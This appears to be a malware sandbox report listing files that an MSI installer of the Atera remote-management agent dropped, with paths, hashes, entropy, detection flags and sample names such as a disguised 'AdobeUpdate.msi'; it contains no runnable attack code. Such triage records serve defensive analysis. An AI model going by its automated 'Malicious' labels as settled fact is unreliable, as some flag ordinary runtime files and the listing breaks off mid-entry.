                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1442
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.076953226383825
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:JdfrdB2nk3Jc3J4YH33Jy34OqsJ+J4YHKJy34OOAPF7NhOXrRH2/d9r:3frf2nKS4YHJyILsJ+J4YHKJyIv47O7w
                                                                                                                                                                                                                                                                                                                                  MD5:B3BB71F9BB4DE4236C26578A8FAE2DCD
                                                                                                                                                                                                                                                                                                                                  SHA1:1AD6A034CCFDCE5E3A3CED93068AA216BD0C6E0E
                                                                                                                                                                                                                                                                                                                                  SHA-256:E505B08308622AD12D98E1C7A07E5DC619A2A00BCD4A5CBE04FE8B078BCF94A2
                                                                                                                                                                                                                                                                                                                                  SHA-512:FB6A46708D048A8F964839A514315B9C76659C8E1AB2CD8C5C5D8F312AA4FB628AB3CE5D23A793C41C13A2AA6A95106A47964DAD72A5ECB8D035106FC5B7BA71
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.... <appSettings>.. .. .. .. <add key="ClientSettingsProvider.ServiceUri" value="" />.. </appSettings>.. .. .. <system.web>.. <membership defaultProvider="ClientAuthenticationMembershipProvider">.. <providers>.. <add name="ClientAuthenticationMembershipProvider" type="System.Web.ClientServices.Providers.ClientFormsAuthenticationMembershipProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" />.. </providers>.. </membership>.. <roleManager defaultProvider="ClientRoleProvider" enabled="true">.. <providers>.. <add name="ClientRoleProvider" type="System.Web.ClientServices.Providers.ClientRoleProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" cacheTimeout="86
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):3318832
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.534876879948643
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:yIBbo0WIgmjljFtXCdRLRBcJd+KaGxHIkMNqzP56O8lZ7qXUqi9p:DBbBWIgWljGxRB/LLp
                                                                                                                                                                                                                                                                                                                                  MD5:11CC798BAFA45BE12D27C68D6B59BA27
                                                                                                                                                                                                                                                                                                                                  SHA1:4D1CA0C0F1BC3691F5F852CC8D3ED88605B70434
                                                                                                                                                                                                                                                                                                                                  SHA-256:443A1C088E62810A954FFE9F0136F7A8D5E44928425D23B5284D936270D9837A
                                                                                                                                                                                                                                                                                                                                  SHA-512:FA0AEAF5309FD1593DB8AF774F18AA9CDA9B7ABD3F32D34CFD1B615EE68CECA0155DFB0AB7351E182B1B9D872BF41B19E66D2B597D2BA6300AF332A0F525C75A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                                                                                                                  • Filename: ALVARA-072.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                  • Filename: setup_north_west_arctic_borrough.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                  • Filename: 9rSeCZbjZE.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                  • Filename: TRABALHO----PROCESSO0014S55-S440000000S1.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Program.RemoteAdminNET.1.367.20003.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                  • Filename: AdobeUpdate.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Program.RemoteAdminNET.1.3218.16257.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                  • Filename: Y3Wvl9aYAU.cmd, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Program.RemoteAdminNET.1.15125.10364.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Program.RemoteAdminNET.1.7216.330.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):215088
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.030864151731967
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:r1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7s/k:mIzm6pOIgvr7ok
                                                                                                                                                                                                                                                                                                                                  MD5:C106DF1B5B43AF3B937ACE19D92B42F3
                                                                                                                                                                                                                                                                                                                                  SHA1:7670FC4B6369E3FB705200050618ACAA5213637F
                                                                                                                                                                                                                                                                                                                                  SHA-256:2B5B7A2AFBC88A4F674E1D7836119B57E65FAE6863F4BE6832C38E08341F2D68
                                                                                                                                                                                                                                                                                                                                  SHA-512:616E45E1F15486787418A2B2B8ECA50CACAC6145D353FF66BF2C13839CD3DB6592953BF6FEED1469DB7DDF2F223416D5651CD013FB32F64DC6C72561AB2449AE
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):710192
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.96048066969898
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:3BARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUU:3BA/ZTvQD0XY0AJBSjRlXP36RMGV
                                                                                                                                                                                                                                                                                                                                  MD5:2C4D25B7FBD1ADFD4471052FA482AF72
                                                                                                                                                                                                                                                                                                                                  SHA1:FD6CD773D241B581E3C856F9E6CD06CB31A01407
                                                                                                                                                                                                                                                                                                                                  SHA-256:2A7A84768CC09A15362878B270371DAAD9872CAACBBEEBE7F30C4A7ED6C03CA7
                                                                                                                                                                                                                                                                                                                                  SHA-512:F7F94EC00435466DB2FB535A490162B906D60A3CFA531A36C4C552183D62D58CCC9A6BB8BBFE39815844B0C3A861D3E1F1178E29DBCB6C09FA2E6EBBB7AB943A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1967312
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999049879452388
                                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:2xK5u/Nel2lKkBkfNuj9KXiUYL/L6ER9PH/KN1:Ws0refNk9KXjg6k9K7
                                                                                                                                                                                                                                                                                                                                  MD5:E0B94CE5D948F332B6BCB4661B73611B
                                                                                                                                                                                                                                                                                                                                  SHA1:A9272BD639FF5F25F44B3A31C5CB919F0D40C4D3
                                                                                                                                                                                                                                                                                                                                  SHA-256:A27B758C00EAB6777AC9571EF4FCDB80ABACCBC4EB6FA5FF8E5EC33C08FFBC37
                                                                                                                                                                                                                                                                                                                                  SHA-512:17B5DF8EA6CCBB64839E5D223ED388A3BB54C0A7974E05E285361E36489D63F9E4A5F0DA21CDF86C58DBE80903E8CB288817291DCE4C7E98E8E8CE8A0B912B46
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):39359
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.001107788783311
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:YT5DUarXaaec21v5Oc55MNXP4RBTEQ88jnfA:YNDUarXaaecC5Oc55mXP4TTEuA
                                                                                                                                                                                                                                                                                                                                  MD5:D4D3077248D2EC265329DA2BB4EB1409
                                                                                                                                                                                                                                                                                                                                  SHA1:C4118CD8CC0C738D212BD57B262C83652BD06582
                                                                                                                                                                                                                                                                                                                                  SHA-256:6E5DCE5A789BB451AF3B5136C9832DA6A621A92EAA151D1BA699B9C0FB6CFB9E
                                                                                                                                                                                                                                                                                                                                  SHA-512:AC479A172E4F0E90A096B13D5F785EC3184F214000B9578D835E9A4FBF7BA64F3C2D0F679C6B0F325B9A34623E8548CBD4B8C1873A4DF1CAFECC94AAD343F7BD
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Preview:{.. "runtimeTarget": {.. "name": ".NETCoreApp,Version=v6.0",.. "signature": "".. },.. "compilationOptions": {},.. "targets": {.. ".NETCoreApp,Version=v6.0": {.. "Agent.Package.Watchdog/1.7": {.. "dependencies": {.. "Atera.Agent.Package.Infrastructure": "1.2.4",.. "Atera.Agent.Package.Tools": "1.0.22",.. "System.ServiceProcess.ServiceController": "8.0.0",.. "TaskScheduler": "2.10.1".. },.. "runtime": {.. "Agent.Package.Watchdog.dll": {}.. }.. },.. "Atera.Agent.Package.Infrastructure/1.2.4": {.. "dependencies": {.. "Microsoft.Extensions.Hosting": "7.0.1",.. "Newtonsoft.Json": "13.0.3",.. "Polly": "7.2.3",.. "Serilog.Extensions.Hosting": "5.0.1",.. "Serilog.Sinks.File": "5.0.0".. },.. "runtime": {.. "lib/net6.0/Atera.Agent.Package.Infrastructure.dll": {.. "assemblyVersion": "1.2.4.0",.. "fileVe
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):35408
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.47147075844103
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:I0uXcA8f/rEacom1OiYW32L0k8pJsjmd+uE8aNmHCiYVGx5mNyb8E9VF6IYijSJn:IDXcA8HBcomwxW3Rk3C+udBuEpYi60q
                                                                                                                                                                                                                                                                                                                                  MD5:BF7FBE22354E89B5DF6F582973F5B22B
                                                                                                                                                                                                                                                                                                                                  SHA1:72EC8C0FC38C56B3C54470D2E06F12A1E953E380
                                                                                                                                                                                                                                                                                                                                  SHA-256:5EB9E33C135DC0D15CF5F76DBA79F708853B90D95E4AD4442A9F0FEE1463B670
                                                                                                                                                                                                                                                                                                                                  SHA-512:7C3EC0AB5060F94112BB80D399041913066619E75786AC6549733478FEDA8D8318D3470798EC4E16F54D7D04C9E1962D66DEB33855F18A42C45BC0A396EC7AD5
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):161360
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.243709345342072
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:T5vnr5Tbx829UOeKnn2LFzZBp13u36wKp4CULCXodwq:TBKjK2LFzZNfJULqA
                                                                                                                                                                                                                                                                                                                                  MD5:57130702F8EA46ED0437EA893C95F7E4
                                                                                                                                                                                                                                                                                                                                  SHA1:0E26C3EF0EC0BE063AACD7321EE550E321BAD17F
                                                                                                                                                                                                                                                                                                                                  SHA-256:9338C8080CB7BE1EE73F1CD706E5E230A0C3B8690305CD9DE451FAD20B2D0B7B
                                                                                                                                                                                                                                                                                                                                  SHA-512:10951C367AC35DBA9D644FB1CC07043FC238F4CAD5AB2280CC1102E860676E1BC4B3A88054F252E26AA9B9E2B52C8941C2D47E1E79D153B4EE3780151C73A02C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):13
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7004397181410926
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:WhUmov:Wvov
                                                                                                                                                                                                                                                                                                                                  MD5:82F71B382E51CAE212E670779DBDF14E
                                                                                                                                                                                                                                                                                                                                  SHA1:C764F353E7B76236468649989C39EAEF3B97E701
                                                                                                                                                                                                                                                                                                                                  SHA-256:B57642302DEA3460BD78B6D9C62593939852C8526BA1779067D411E4DDA3DE17
                                                                                                                                                                                                                                                                                                                                  SHA-512:C5687A7DBBD4C714181F1ECFE1810A48109A4D9D4E3E90E88DA67FA3CB2736D5B3AA260B6680FA6A07FAA66CCB59DB05F9E8E345FD0DC50ABB63CB83DAAF0BFF
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Preview:version=1.7..
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):288
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.622820819612829
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:3Hp/hdNyhAkv3Opo/XCkyFNOJeZS1sHZeQ6NOCUo+K8EkNTy:dFkv3OpJ5MeU1s5hex+K8Es2
                                                                                                                                                                                                                                                                                                                                  MD5:AA6C95679FBDCCE9930CD0588089344B
                                                                                                                                                                                                                                                                                                                                  SHA1:46294C035BFB927915DC089C67475610AF904E86
                                                                                                                                                                                                                                                                                                                                  SHA-256:8DA9CA03D76A3AA7BAB068EC578B441B3DC3BA7F9C94EE42203286B8E650F5B9
                                                                                                                                                                                                                                                                                                                                  SHA-512:91EC4C51D846AA4D881F02FFE051B4A6BDD7263574214186D7D8609AD4447E38D5547586C3B973FD6371622A6F574B767405074ABC96CFF40B7B3D7C8A9F7842
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Preview:{.. "runtimeOptions": {.. "tfm": "net6.0",.. "rollForward": "LatestMajor",.. "framework": {.. "name": "Microsoft.NETCore.App",.. "version": "6.0.0".. },.. "configProperties": {.. "System.Reflection.Metadata.MetadataUpdater.IsSupported": false.. }.. }..}
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):53840
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.298479197446433
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:wdUSqld/oh93y+UR4ULL4L88EKNoo9sXQqthEpYi60QcL:wd2P/phL4L8KGo9sgqtK76i
                                                                                                                                                                                                                                                                                                                                  MD5:80191EE3D5222E24FDD9BC881060AFF5
                                                                                                                                                                                                                                                                                                                                  SHA1:F160954F0C85D46898FBE0389CD73248DEB3AE2F
                                                                                                                                                                                                                                                                                                                                  SHA-256:21841818D392592064E6E0F804B8FD335BC489CCF9F70C28365077F1340B6A6A
                                                                                                                                                                                                                                                                                                                                  SHA-512:FBB489261990DBD14D7C224526F8FDBEA8984DD52670C8D4EBA11B08F7A2C68BB02BBC1FDEFFE81CFCEBE41474DE2CC0F4EDEF9F1A95E88B1C6A9A5547820FB0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):66640
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.273406477094498
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:SO4QNCMhTIDWo+hDbEicjIeoCtU1a1ZTG/2u2Xv2vFbanu5jEpYi60ItX:MQTIywi3eobgTG/2u2/wb0u5c76dX
                                                                                                                                                                                                                                                                                                                                  MD5:3F4B8203C5CBC904B4A8763DA3CEBC72
                                                                                                                                                                                                                                                                                                                                  SHA1:69548F86D313F1530DA7195402593B5B05A6F1DD
                                                                                                                                                                                                                                                                                                                                  SHA-256:7E3E1E3B0D3007CB4058F14D039D670B024ABF2FCCC748411A8756DD586F7A8E
                                                                                                                                                                                                                                                                                                                                  SHA-512:C82747411384F88F8D2AA0E51CBFA23786C073F83931716638B8D6E370A0123471E82EF4A6EEA23A52C3AC28B741DF95EED4E7CA28075EA30E44ED54D6E0B8F9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):186448
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.958017277458429
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:KhOh6zHpz7YSkfd6kUYm4wlb6QAGcbLQpgjOHopZb7UsUDfAbmn1F8mSowoT:KhJ177+9jQAVph4sUDfAbm1F8lG
                                                                                                                                                                                                                                                                                                                                  MD5:74C43B0E91A1B1CFF24CF98CE3783677
                                                                                                                                                                                                                                                                                                                                  SHA1:E7DA6F0D1F57F3E73835E67C8A602F9858263EEA
                                                                                                                                                                                                                                                                                                                                  SHA-256:B287B1909651387D07C06C881AC6DECEEA13000897AF269647E97D810278A881
                                                                                                                                                                                                                                                                                                                                  SHA-512:AE14518570E7F1A17D287010A8F696D7634EDBD5B344CC77BF55D378319EA8C5666FCE8743538149C7A4F84010D31E4899D3A0F033FC1FA6FFBA8CE451C01BC0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):29264
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.523133869724914
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:n+q+2Vv/+usFlLVyKo/9ETG/DwzzRjz69M1ZVMdWs6NWskgNyb8E9VF6IYijSJI1:n+EF/CvyKohrqn3EpYi60NP
                                                                                                                                                                                                                                                                                                                                  MD5:0A0AF8B9C249F09A343637F326FB3F16
                                                                                                                                                                                                                                                                                                                                  SHA1:2676A8ECAE75F9C688DBB4D7A3A58FBE317FF036
                                                                                                                                                                                                                                                                                                                                  SHA-256:17CC107993EFD8B812FC9A1F8541F472EC7323DDB0F0C5BBA05A0E7B9E039EFF
                                                                                                                                                                                                                                                                                                                                  SHA-512:78E3A2E6D4179D857AC4E923116BE6EE759B171B55711A9BE83AD5C851DBA5F0706012E2775F8946EB498D259FF83BB3D4CB5553650AF5029801A1D427CFB74B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):42576
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.406276432201498
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:vThLeDjUB16TI1CQ12cMcFgL/l5dgEpYi60I:vTvB71dEcME45dp761
                                                                                                                                                                                                                                                                                                                                  MD5:5240B7756AE77FFDA964F99E6BCF3DB9
                                                                                                                                                                                                                                                                                                                                  SHA1:F7AF3AC3E97426C23B134ADA22527EE18932C4E2
                                                                                                                                                                                                                                                                                                                                  SHA-256:6DD93B898FE0DC2133B9BB516063256409639D7864B617B7B87F9A747559BC46
                                                                                                                                                                                                                                                                                                                                  SHA-512:69760B00719EA26D2E0C25A5A11F23FDE8B38B4D648D85325190A4C6A6BC81A5A69A3D00EDA78D58D506C8911B5E3DB593E128C3FFFAE4463DCB4D6D582CF435
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):25168
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.66969016312103
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:AYEMITBweJkneGO3WKGW9anWsxNyb8E9VF6IYijSJIVxOSh2CQ:GTBwa7dEtVEpYi60+CQ
                                                                                                                                                                                                                                                                                                                                  MD5:5C156BB2C894165B9FAB27D0ABBE4611
                                                                                                                                                                                                                                                                                                                                  SHA1:2004F377D72FE1F131B5FEC6FFC20B028162A34B
                                                                                                                                                                                                                                                                                                                                  SHA-256:5A2E267775D8146C2F3DC3A5DF74753CA52172AC4F5FC319234BB42BF97E11B7
                                                                                                                                                                                                                                                                                                                                  SHA-512:BB5E1A0E8088B87C635275A62A31DFCC97F899AAC175A83A994D222B79CFE37EEA4BD6F632AF10D3CD6471208756082543D9AA2B7A86530847996CE04D66884A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):21584
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.715302117184057
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:46jxRm3soGTeZeszQm31WUKeWstNyb8E9VF6IYijSJIVxen7sYA:Xj23spTeZposJEpYi60+A
                                                                                                                                                                                                                                                                                                                                  MD5:1CCE7C95F9F4C3D365493C168700B16E
                                                                                                                                                                                                                                                                                                                                  SHA1:A2621BBC46E037EA15AF4BF7F75184B310193AAA
                                                                                                                                                                                                                                                                                                                                  SHA-256:45F886050A0CEF18098CE8A9B07922C63025938AA9FA09230EBCBEBFB9774FDF
                                                                                                                                                                                                                                                                                                                                  SHA-512:6E13DCA30B2F2ADB102B440D33DF9DE1BA0C043B96DD1FCABE53BF1D983853945291129FC69D3AD86270AE0AB5032BCFDF761779158E9D3C9E5808B874CDC3D7
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):28240
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.601922790426778
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:nzp434gr92+liFe/5XjtCZ0UaFoSc43IXABPpBzWq66WsdNyb8E9VF6IYijSJIVk:zxk1/9jtGhScRwPpByoZEpYi608LH
                                                                                                                                                                                                                                                                                                                                  MD5:3C24D1DE7E43DDC8C2B542AF65FB56D8
                                                                                                                                                                                                                                                                                                                                  SHA1:4693383CF7D38937059AD5126A1F26D7C0A1D792
                                                                                                                                                                                                                                                                                                                                  SHA-256:E30298D1F1D024C671CE3C59171128F61047BD33D48017C95C43A275AFCC255D
                                                                                                                                                                                                                                                                                                                                  SHA-512:7E498195D9B9A56C6A691D735DFC4F4B60D0DBD5343A080C69778475E7670A60EE313EC6A2A0B8516AEC9BCC4E1A9A1AC61878F0E6DCAC65191E3C6CA7B04133
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):27728
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.563596604110572
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:TXLAulT7JkcAoWovkT7jF6zOFz3Ge1l68mWka2WsGNyb8E9VF6IYijSJIVxltMsv:bLAux7yUcT7jF6aYhSkOEpYi60Tv
                                                                                                                                                                                                                                                                                                                                  MD5:891601A14B4EE9A715F84269B27E7792
                                                                                                                                                                                                                                                                                                                                  SHA1:5E701FCF30569478E5C021D85B11EF2B4DE3FFA3
